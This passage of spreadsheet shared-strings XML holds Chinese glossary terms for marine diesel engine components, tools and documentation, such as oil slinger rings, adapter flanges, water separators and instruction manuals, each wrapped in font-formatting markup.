        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>试车报告</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>试车和试航</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>试车后的工作</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>试车开始前柴油机清洗</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>试车台安全检查建议</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>试验工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>试验台（研究中心</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>T-35)</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>试验图纸</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部件（装配）</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>试验压力计</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>适配</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>紧固螺栓说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>适配衬套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>适配法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>适配接头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>适配螺栓，过盈的</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>收缩管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>手柄杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>手柄面板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>从属设备</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>手柄支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>手册</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>手持编程器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>手动高压泵支撑</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>手动控制</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>手轮锁</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>手螺母</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>输出布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>输出轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>输出轴齿轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>输入轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>输入轴粗加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>输入轴的甩油环盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>输入轴法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>输送管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>输送管口盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>鼠标</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>术语</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>数据板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>数据表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>数据及文件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>数据记录面板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>数字刻度盘</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>数字模块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>甩油环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>甩油环</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上部</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>甩油环</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下部</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>甩油环，毛坯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>甩油环安装</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>甩油环附件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>甩油环壳体，上部</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>甩油环</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>橡胶</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>甩油环总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>双层单向阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>双层管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>双层管通风</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>双齿轮安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>双杆顶部支撑</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>双节距发信器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>双冷却器单元安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>双冷却器单元总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>双冷却器支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>双联减震绳索</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>双面开口扳手</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>双燃料控制</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>双头环形扳手</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>双头紧配螺栓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>双头螺栓拧出器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>双头螺纹螺栓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>双头螺柱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>双头套筒扳手</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>双托架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>双止回阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>水泵的安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>水表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>水捕获器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>水测调整</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>水导套的安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>水分离器</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>水分离器的安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>水管结合配件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>水冷却系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>水平仪</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>水润滑艉轴管密封</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>水套管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>水套冷却水系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>水雾分离器泄放管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>水雾分离器质量控制</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>水雾分离质量规格</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>水雾灭火主管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>水雾探测</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>水洗总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>水箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>水蓄压器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>水蒸气灭火装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顺时针滑油泵的安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顺时针推力轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>说明手册</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> - </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>说明书</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>说明书</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>说明书，装置规格</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>说明书第二册</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>说明书第一册</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>丝堵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>丝堵</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>丝杠钳扳手</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
